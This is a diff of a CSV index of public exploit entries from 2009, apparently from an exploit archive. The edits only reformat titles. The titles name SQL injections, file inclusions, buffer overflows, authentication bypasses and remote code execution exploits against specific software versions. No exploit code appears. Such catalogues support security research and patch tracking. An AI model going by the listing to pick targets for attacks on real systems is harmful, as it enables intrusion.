7762,platforms/windows/remote/7762.html,"EDraw Office Viewer 5.4 - HttpDownloadFile() Insecure Method",2009-01-14,Cyber-Zone,windows,remote,0 @@ -7329,14 +7329,14 @@ id,file,description,date,author,platform,type,port 7789,platforms/asp/webapps/7789.txt,"DMXReady SDK <= 1.1 - Remote File Download",2009-01-14,ajann,asp,webapps,0 7790,platforms/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0 7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager <= 1.1 - Remote File Upload",2009-01-15,ajann,asp,webapps,0 -7792,platforms/php/webapps/7792.txt,"GNUBoard 4.31.03 (08.12.29) Local File Inclusion",2009-01-15,flyh4t,php,webapps,0 +7792,platforms/php/webapps/7792.txt,"GNUBoard 4.31.03 - (08.12.29) Local File Inclusion",2009-01-15,flyh4t,php,webapps,0 7793,platforms/php/webapps/7793.php,"Joomla com_Eventing 1.6.x - BlindSQL Injection Exploit",2009-01-15,InjEctOr5,php,webapps,0 7794,platforms/windows/remote/7794.html,"Ciansoft PDFBuilderX 2.2 - ActiveX Arbitrary File Overwrite Exploit",2009-01-15,"Alfons Luja",windows,remote,0 -7795,platforms/php/webapps/7795.txt,"Joomla Component RD-Autos 1.5.5 (id) SQL Injection",2009-01-15,H!tm@N,php,webapps,0 +7795,platforms/php/webapps/7795.txt,"Joomla Component RD-Autos 1.5.5 - (id) SQL Injection",2009-01-15,H!tm@N,php,webapps,0 7796,platforms/php/webapps/7796.txt,"mkportal <= 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0 -7797,platforms/php/webapps/7797.php,"Blue Eye CMS <= 1.0.0 (clanek) Blind SQL Injection Exploit",2009-01-15,darkjoker,php,webapps,0 +7797,platforms/php/webapps/7797.php,"Blue Eye CMS <= 1.0.0 - (clanek) Blind SQL Injection Exploit",2009-01-15,darkjoker,php,webapps,0 7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script (readbible.php) SQL Injection",2009-01-15,nuclear,php,webapps,0 -7799,platforms/windows/dos/7799.pl,"Novell Netware 6.5 (ICEbrowser) Remote System DoS Exploit",2009-01-16,"Jeremy Brown",windows,dos,0 +7799,platforms/windows/dos/7799.pl,"Novell Netware 6.5 - (ICEbrowser) Remote System DoS Exploit",2009-01-16,"Jeremy Brown",windows,dos,0 7800,platforms/asp/webapps/7800.txt,"eFAQ (Auth Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 7801,platforms/asp/webapps/7801.txt,"eReservations (Auth Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 7802,platforms/asp/webapps/7802.txt,"The Walking Club (Auth Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 @@ -7344,12 +7344,12 @@ id,file,description,date,author,platform,type,port 7804,platforms/windows/remote/7804.html,"MetaProducts MetaTreeX 1.5.100 - ActiveX File Overwrite Exploit",2009-01-16,Houssamix,windows,remote,0 7805,platforms/php/webapps/7805.txt,"rankem - (DD/XSS/cm) Multiple Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0 7806,platforms/php/webapps/7806.txt,"blogit! - (SQL/DD/XSS) Multiple Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0 -7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 (Auth Bypass) SQL Injection",2009-01-16,SuB-ZeRo,asp,webapps,0 +7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - (Auth Bypass) SQL Injection",2009-01-16,SuB-ZeRo,asp,webapps,0 7809,platforms/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Remote Shell Upload",2009-01-16,ZoRLu,php,webapps,0 7810,platforms/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Remote Shell Upload",2009-01-16,ZoRLu,php,webapps,0 7811,platforms/php/webapps/7811.txt,"Aj Classifieds For Sale 3.0 - Remote Shell Upload",2009-01-16,ZoRLu,php,webapps,0 7812,platforms/multiple/dos/7812.pl,"MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC",2009-01-16,sCORPINo,multiple,dos,0 -7813,platforms/php/webapps/7813.txt,"Simple PHP Newsletter 1.5 (olang) Local File Inclusion Vulnerabilities",2009-01-16,ahmadbady,php,webapps,0 +7813,platforms/php/webapps/7813.txt,"Simple PHP Newsletter 1.5 - (olang) Local File Inclusion Vulnerabilities",2009-01-16,ahmadbady,php,webapps,0 7814,platforms/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injection Vulnerabilities",2009-01-16,nuclear,php,webapps,0 7815,platforms/php/webapps/7815.txt,"Joomla Component Gigcal 1.x - (id) SQL Injection",2009-01-18,Lanti-Net,php,webapps,0 7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN Database Disclosure",2009-01-18,Moudi,asp,webapps,0 @@ -7369,14 +7369,14 @@ id,file,description,date,author,platform,type,port 7831,platforms/php/webapps/7831.txt,"Ninja Blog 4.8 - Remote Information Disclosure",2009-01-19,"Danny Moules",php,webapps,0 7832,platforms/php/webapps/7832.txt,"phpads 2.0 - Multiple Vulnerabilities",2009-01-19,"Danny Moules",php,webapps,0 7833,platforms/php/webapps/7833.php,"Joomla com_waticketsystem Blind SQL Injection Exploit",2009-01-19,InjEctOr5,php,webapps,0 -7834,platforms/php/webapps/7834.txt,"Ninja Blog 4.8 (CSRF/HTML Injection)",2009-01-19,"Danny Moules",php,webapps,0 +7834,platforms/php/webapps/7834.txt,"Ninja Blog 4.8 - (CSRF/HTML Injection)",2009-01-19,"Danny Moules",php,webapps,0 7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 - Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0 7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - (id) SQL Injection",2009-01-20,snakespc,php,webapps,0 7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution Exploit",2009-01-20,Osirys,php,webapps,0 7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 - (dodosquiz.php) Local File Inclusion",2009-01-20,Stack,php,webapps,0 -7839,platforms/windows/local/7839.py,"Total Video Player 1.31 (DefaultSkin.ini) Local Stack Overflow Exploit",2009-01-20,His0k4,windows,local,0 +7839,platforms/windows/local/7839.py,"Total Video Player 1.31 - (DefaultSkin.ini) Local Stack Overflow Exploit",2009-01-20,His0k4,windows,local,0 7840,platforms/php/webapps/7840.pl,"Joomla Com BazaarBuilder Shopping Cart 5.0 - SQL Injection Exploit",2009-01-21,XaDoS,php,webapps,0 -7841,platforms/php/webapps/7841.txt,"Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection",2009-01-21,"Br1ght D@rk",php,webapps,0 +7841,platforms/php/webapps/7841.txt,"Mambo Component SOBI2 RC 2.8.2 - (bid) SQL Injection",2009-01-21,"Br1ght D@rk",php,webapps,0 7842,platforms/windows/remote/7842.html,"Firefox 3.0.5 Status Bar Obfuscation / Clickjacking",2009-01-21,MrDoug,windows,remote,0 7843,platforms/windows/local/7843.c,"Browser3D 3.5 - (.sfs) Local Stack Overflow Exploit (C)",2009-01-22,SimO-s0fT,windows,local,0 7844,platforms/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 passwd.dat Disclosure Exploit",2009-01-21,Pouya_Server,php,webapps,0 @@ -7384,71 +7384,71 @@ id,file,description,date,author,platform,type,port 7846,platforms/php/webapps/7846.php,"Joomla com_pcchess (game_id) Blind SQL Injection Exploit",2009-01-21,InjEctOr5,php,webapps,0 7847,platforms/php/webapps/7847.txt,"Joomla Component beamospetition 1.0.12 SQL Injection / XSS",2009-01-21,vds_s,php,webapps,0 7848,platforms/windows/local/7848.pl,"Browser3D 3.5 - (.sfs) Local Stack Overflow Exploit (Perl)",2009-01-22,AlpHaNiX,windows,local,0 -7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 (autor.php) SQL Injection",2009-01-22,nuclear,php,webapps,0 +7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 - (autor.php) SQL Injection",2009-01-22,nuclear,php,webapps,0 7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 Insecure Cookie Method",2009-01-22,"Khashayar Fereidani",asp,webapps,0 7851,platforms/php/webapps/7851.php,"Pardal CMS <= 0.2.0 - Blind SQL Injection Exploit",2009-01-22,darkjoker,php,webapps,0 -7852,platforms/windows/dos/7852.pl,"FTPShell Server 4.3 (licence key) Remote Buffer Overflow PoC",2009-01-22,LiquidWorm,windows,dos,0 +7852,platforms/windows/dos/7852.pl,"FTPShell Server 4.3 - (licence key) Remote Buffer Overflow PoC",2009-01-22,LiquidWorm,windows,dos,0 7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER - (.m3u) Local Stack Overflow Exploit",2009-01-25,AlpHaNiX,windows,local,0 7854,platforms/windows/dos/7854.pl,"MediaMonkey 3.0.6 - (.m3u) Local Buffer Overflow PoC",2009-01-25,AlpHaNiX,windows,dos,0 7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 m3u file Local Buffer Overflow PoC",2009-01-25,Houssamix,windows,dos,0 7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 - CSRF Exploit",2009-01-25,spdr,hardware,remote,0 -7859,platforms/php/webapps/7859.pl,"MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit",2009-01-25,StAkeR,php,webapps,0 +7859,platforms/php/webapps/7859.pl,"MemHT Portal <= 4.0.1 - (avatar) Remote Code Execution Exploit",2009-01-25,StAkeR,php,webapps,0 7860,platforms/php/webapps/7860.php,"Mambo com_sim 0.8 - Blind SQL Injection Exploit",2009-01-25,"Mehmet Ince",php,webapps,0 -7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 (Auth Bypass) SQL Injection",2009-01-25,ByALBAYX,asp,webapps,0 -7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 (cat_id) SQL Injection",2009-01-25,JIKO,php,webapps,0 -7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0 -7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 (password.dat) Disclosure Exploit",2009-01-25,Pouya_Server,php,webapps,0 +7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - (Auth Bypass) SQL Injection",2009-01-25,ByALBAYX,asp,webapps,0 +7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - (cat_id) SQL Injection",2009-01-25,JIKO,php,webapps,0 +7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0 +7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (password.dat) Disclosure Exploit",2009-01-25,Pouya_Server,php,webapps,0 7865,platforms/solaris/dos/7865.c,"SunOS Release 5.11 snv_101b - Remote IPv6 Crash Exploit",2009-01-26,kingcope,solaris,dos,0 7866,platforms/php/webapps/7866.txt,"Simple Machines Forum <= 1.1.7 - CSRF/XSS/Package Upload",2009-01-26,Xianur0,php,webapps,0 -7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 (index.php id) Blind SQL Injection Exploit",2009-01-26,fuzion,php,webapps,0 +7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection Exploit",2009-01-26,fuzion,php,webapps,0 7868,platforms/windows/remote/7868.html,"FlexCell Grid Control 5.6.9 - Remote File Overwrite Exploit",2009-01-26,Houssamix,windows,remote,0 7869,platforms/windows/dos/7869.html,"MW6 Barcode ActiveX (Barcode.dll) Reamote Heap Overflow PoC",2009-01-26,Houssamix,windows,dos,0 7871,platforms/windows/remote/7871.html,"NCTVideoStudio ActiveX DLLs 1.6 Insecure Method File Creation Exploit",2009-01-26,Stack,windows,remote,0 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Auth Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0 7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 (show_cat2.php grid) - SQL Injection",2009-01-26,FeDeReR,php,webapps,0 -7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 (LIST) Remote Buffer Overflow Exploit (post-auth)",2009-01-26,"joe walko",windows,remote,21 -7876,platforms/php/webapps/7876.php,"PHP-CMS 1 (username) Blind SQL Injection Exploit",2009-01-26,darkjoker,php,webapps,0 +7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - (LIST) Remote Buffer Overflow Exploit (post-auth)",2009-01-26,"joe walko",windows,remote,21 +7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - (username) Blind SQL Injection Exploit",2009-01-26,darkjoker,php,webapps,0 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0 7878,platforms/php/webapps/7878.txt,"Groone's GLink Organizer (index.php cat) SQL Injection",2009-01-26,nuclear,php,webapps,0 -7879,platforms/php/webapps/7879.pl,"SiteXS <= 0.1.1 (type) Local File Inclusion Exploit",2009-01-26,darkjoker,php,webapps,0 +7879,platforms/php/webapps/7879.pl,"SiteXS <= 0.1.1 - (type) Local File Inclusion Exploit",2009-01-26,darkjoker,php,webapps,0 7880,platforms/php/webapps/7880.txt,"ClickAuction (Auth Bypass) Remote SQL Injection",2009-01-26,R3d-D3V!L,php,webapps,0 7881,platforms/php/webapps/7881.txt,"Joomla com_flashmagazinedeluxe (mag_id) SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0 7882,platforms/windows/dos/7882.html,"NCTVideoStudio ActiveX DLLs 1.6 - Remote Heap Overflow PoC",2009-01-26,Stack,windows,dos,0 -7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 (MAX_type) Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0 +7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - (MAX_type) Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0 7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps,0 -7885,platforms/php/webapps/7885.txt,"Max.Blog <= 1.0.6 (show_post.php) SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0 +7885,platforms/php/webapps/7885.txt,"Max.Blog <= 1.0.6 - (show_post.php) SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0 7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusion Vulnerabilities",2009-01-27,DSecRG,php,webapps,0 7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - (PLS File) Stack Overflow PoC",2009-01-27,Hakxer,windows,dos,0 7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - (PLS File) Local Buffer Overflow Exploit (univ)",2009-01-28,Houssamix,windows,local,0 7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - (M3U FILE) Local Heap Overflow PoC",2009-01-27,Hakxer,windows,dos,0 7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - (gqmpeg File) Buffer Overflow PoC",2009-01-27,Hakxer,windows,dos,0 -7892,platforms/php/webapps/7892.php,"Community CMS <= 0.4 (/index.php id) Blind SQL Injection Exploit",2009-01-28,darkjoker,php,webapps,0 +7892,platforms/php/webapps/7892.php,"Community CMS <= 0.4 - (/index.php id) Blind SQL Injection Exploit",2009-01-28,darkjoker,php,webapps,0 7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - (XSS/SQL/LFI) Multiple Vulnerabilities",2009-01-28,"Encrypt3d.M!nd ",php,webapps,0 7894,platforms/php/webapps/7894.txt,"Chipmunk Blog (Auth Bypass) Add Admin Exploit",2009-01-28,x0r,php,webapps,0 7895,platforms/php/webapps/7895.txt,"Gazelle CMS (template) Local File Inclusion",2009-01-28,fuzion,php,webapps,0 -7896,platforms/php/webapps/7896.php,"Lore 1.5.6 (article.php) Blind SQL Injection Exploit",2009-01-28,OzX,php,webapps,0 -7897,platforms/php/webapps/7897.php,"phplist 2.10.x (RCE by environ inclusion) Local File Inclusion Exploit",2009-01-28,mozi,php,webapps,0 -7898,platforms/php/webapps/7898.txt,"Max.Blog <= 1.0.6 (submit_post.php) SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0 -7899,platforms/php/webapps/7899.txt,"Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0 +7896,platforms/php/webapps/7896.php,"Lore 1.5.6 - (article.php) Blind SQL Injection Exploit",2009-01-28,OzX,php,webapps,0 +7897,platforms/php/webapps/7897.php,"phplist 2.10.x - (RCE by environ inclusion) Local File Inclusion Exploit",2009-01-28,mozi,php,webapps,0 +7898,platforms/php/webapps/7898.txt,"Max.Blog <= 1.0.6 - (submit_post.php) SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0 +7899,platforms/php/webapps/7899.txt,"Max.Blog <= 1.0.6 - (offline_auth.php) Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0 7900,platforms/php/webapps/7900.txt,"Social Engine (category_id) SQL Injection",2009-01-28,snakespc,php,webapps,0 -7901,platforms/php/webapps/7901.py,"SmartSiteCMS 1.0 (articles.php var) Blind SQL Injection Exploit",2009-01-28,certaindeath,php,webapps,0 +7901,platforms/php/webapps/7901.py,"SmartSiteCMS 1.0 - (articles.php var) Blind SQL Injection Exploit",2009-01-28,certaindeath,php,webapps,0 7902,platforms/windows/dos/7902.txt,"Amaya Web Editor XML and HTML parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0 7903,platforms/windows/remote/7903.html,"Google Chrome 1.0.154.43 - ClickJacking",2009-01-28,x0x,windows,remote,0 7904,platforms/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder (M3U File) Crash PoC",2009-01-29,Hakxer,windows,dos,0 7905,platforms/php/webapps/7905.pl,"Personal Site Manager <= 0.3 - Remote Command Execution Exploit",2009-01-29,darkjoker,php,webapps,0 7906,platforms/windows/dos/7906.pl,"Amaya Web Editor <= 11.0 - Remote Buffer Overflow PoC",2009-01-29,Stack,windows,dos,0 -7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0 +7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0 7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload",2009-01-29,"Michael Brooks",php,webapps,0 7910,platforms/windows/remote/7910.html,"WOW Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote,0 7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple Remote SQL Injection VUlnerabilities",2009-01-29,Zigma,php,webapps,0 7912,platforms/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - ClickJacking",2009-01-29,UzmiX,windows,remote,0 7913,platforms/windows/remote/7913.pl,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow Exploit",2009-01-29,SkD,windows,remote,21 7915,platforms/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 - (FD/XSS) Multiple Vulnerabilities",2009-01-29,"Usman Saeed",hardware,remote,0 -7916,platforms/php/webapps/7916.txt,"NetArtMedia Car Portal 1.0 (Auth Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0 -7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 beta 4.2 (login.php school) Blind SQL Injection Exploit",2009-01-29,darkjoker,php,webapps,0 +7916,platforms/php/webapps/7916.txt,"NetArtMedia Car Portal 1.0 - (Auth Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0 +7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 beta 4.2 - (login.php school) Blind SQL Injection Exploit",2009-01-29,darkjoker,php,webapps,0 7918,platforms/windows/remote/7918.txt,"ManageEngine Firewall Analyzer 5 - CSRF/XSS",2009-01-29,"Michael Brooks",windows,remote,0 7919,platforms/windows/remote/7919.txt,"Profense Web Application Firewall 2.6.2 - CSRF/XSS Vulnerabilities",2009-01-29,"Michael Brooks",windows,remote,0 7920,platforms/hardware/remote/7920.txt,"D-Link VoIP Phone Adapter - XSS/CSRF Remote Firmware Overwrite",2009-01-29,"Michael Brooks",hardware,remote,0 @@ -7458,23 +7458,23 @@ id,file,description,date,author,platform,type,port 7924,platforms/asp/webapps/7924.txt,"SalesCart (Auth Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0 7925,platforms/php/webapps/7925.txt,"revou twitter clone - (XSS/SQL) Multiple Vulnerabilities",2009-01-30,nuclear,php,webapps,0 7926,platforms/windows/remote/7926.pl,"Amaya Web Editor 11 - Remote SEH Overwrite Exploit",2009-01-30,LiquidWorm,windows,remote,0 -7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 (09.01.30) Multiple Local/Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0 +7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local/Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0 7928,platforms/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX 3.0 - Null byte File Overwrite",2009-01-30,DSecRG,windows,remote,0 7929,platforms/windows/local/7929.c,"GOM Player 2.0.12 - (.PLS) Universal Buffer Overflow Exploit",2009-01-30,Stack,windows,local,0 7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - (XSS/SQL) Multiple Vulnerabilities",2009-01-30,"Mehmet Ince",php,webapps,0 -7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 (Topic) Remote XSS",2009-01-30,J-Hacker,php,webapps,0 -7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 (Auth Bypass) SQL Injection",2009-01-30,Dimi4,php,webapps,0 -7933,platforms/php/webapps/7933.txt,"eVision CMS <= 2.0 (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0 -7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 (asx File) off by one Crash Exploit",2009-01-30,Houssamix,windows,dos,0 -7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC",2009-01-30,waraxe,windows,remote,0 +7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - (Topic) Remote XSS",2009-01-30,J-Hacker,php,webapps,0 +7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - (Auth Bypass) SQL Injection",2009-01-30,Dimi4,php,webapps,0 +7933,platforms/php/webapps/7933.txt,"eVision CMS <= 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0 +7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 - (asx File) off by one Crash Exploit",2009-01-30,Houssamix,windows,dos,0 +7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 - (ChromeHTML://) Parameter Injection PoC",2009-01-30,waraxe,windows,remote,0 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - (RFI/XSS) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0 -7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC",2009-02-02,"Alfons Luja",php,webapps,0 +7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - (Job fields) XSS/Iframe Injection PoC",2009-02-02,"Alfons Luja",php,webapps,0 7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 - Local File Inclusion Vulnerabilities (Windows)",2009-02-02,ahmadbady,php,webapps,0 7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - (Auth Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0 7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - (Auth Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0 7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC",2009-02-02,AlpHaNiX,windows,dos,0 7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 - (vncviewer.exe) RFB Protocol Remote Code Execution PoC",2009-02-02,"Andres Luksenberg",windows,dos,0 -7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 (blaster_user) Blind SQL Injection Exploit",2009-02-02,darkjoker,php,webapps,0 +7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 - (blaster_user) Blind SQL Injection Exploit",2009-02-02,darkjoker,php,webapps,0 7945,platforms/php/webapps/7945.php,"CMS Mini <= 0.2.2 - Remote Command Execution Exploit",2009-02-02,darkjoker,php,webapps,0 7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,php,webapps,0 7947,platforms/php/webapps/7947.pl,"eVision CMS 2.0 - Remote Code Execution Exploit",2009-02-02,Osirys,php,webapps,0 @@ -7483,47 +7483,47 @@ id,file,description,date,author,platform,type,port 18164,platforms/android/webapps/18164.php,"Android 'content://' URI - Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0 7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 7952,platforms/php/webapps/7952.txt,"WholeHogSoftware Password Protect - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 -7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 (Auth Bypass) Remote SQL Injection",2009-02-03,R3d-D3V!L,php,webapps,0 +7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - (Auth Bypass) Remote SQL Injection",2009-02-03,R3d-D3V!L,php,webapps,0 7954,platforms/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 7955,platforms/php/webapps/7955.txt,"groone's guestbook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 -7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 (Auth Bypass) SQL Injection",2009-02-03,x0r,php,webapps,0 +7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - (Auth Bypass) SQL Injection",2009-02-03,x0r,php,webapps,0 7957,platforms/windows/local/7957.pl,"Free Download Manager <= 3.0 Build 844 - (.torrent) BoF Exploit",2009-02-03,SkD,windows,local,0 7958,platforms/windows/local/7958.pl,"Euphonics Audio Player 1.0 - (.pls) Local Buffer Overflow Exploit",2009-02-03,h4ck3r#47,windows,local,0 7959,platforms/php/webapps/7959.txt,"Simple Machines Forums - (BBCode) Cookie Stealing",2009-02-03,Xianur0,php,webapps,0 7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Remote Shell Upload",2009-02-03,"Hussin X",php,webapps,0 7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b (photo.php id) Blind SQL Injection Exploit",2009-02-03,"Mehmet Ince",php,webapps,0 7962,platforms/windows/dos/7962.pl,"Hex Workshop 6.0 - (ColorMap files .cmap) Invalid Memory Reference PoC",2009-02-03,DATA_SNIPER,windows,dos,0 -7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 (Auth Bypass) SQL Injection",2009-02-03,Kacak,asp,webapps,0 +7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - (Auth Bypass) SQL Injection",2009-02-03,Kacak,asp,webapps,0 7964,platforms/php/webapps/7964.txt,"4Site CMS <= 2.6 - Multiple Remote SQL Injection Vulnerabilities",2009-02-03,D.Mortalov,php,webapps,0 7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0 7966,platforms/windows/remote/7966.txt,"navicopa webserver 3.0.1 - (bof/sd) Multiple Vulnerabilities",2009-02-03,e.wiZz!,windows,remote,0 7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha Remote Command Execution Exploit",2009-02-03,Osirys,php,webapps,0 7968,platforms/php/webapps/7968.php,"DreamPics Photo/Video Gallery Blind SQL Injection Exploit",2009-02-03,"Mehmet Ince",php,webapps,0 7969,platforms/php/webapps/7969.txt,"flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0 -7972,platforms/php/webapps/7972.py,"Openfiler 2.3 (Auth Bypass) Remote Password Change Exploit",2009-02-03,nonroot,php,webapps,0 +7972,platforms/php/webapps/7972.py,"Openfiler 2.3 - (Auth Bypass) Remote Password Change Exploit",2009-02-03,nonroot,php,webapps,0 7973,platforms/windows/local/7973.pl,"Euphonics Audio Player 1.0 - (.pls) Universal Local Buffer Overflow Exploit",2009-02-04,Houssamix,windows,local,0 7974,platforms/windows/local/7974.c,"Euphonics Audio Player 1.0 - (.pls) Local Buffer Overflow Exploit (xp/sp3)",2009-02-04,"Single Eye",windows,local,0 7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Overflow Exploit",2009-02-04,LiquidWorm,windows,local,0 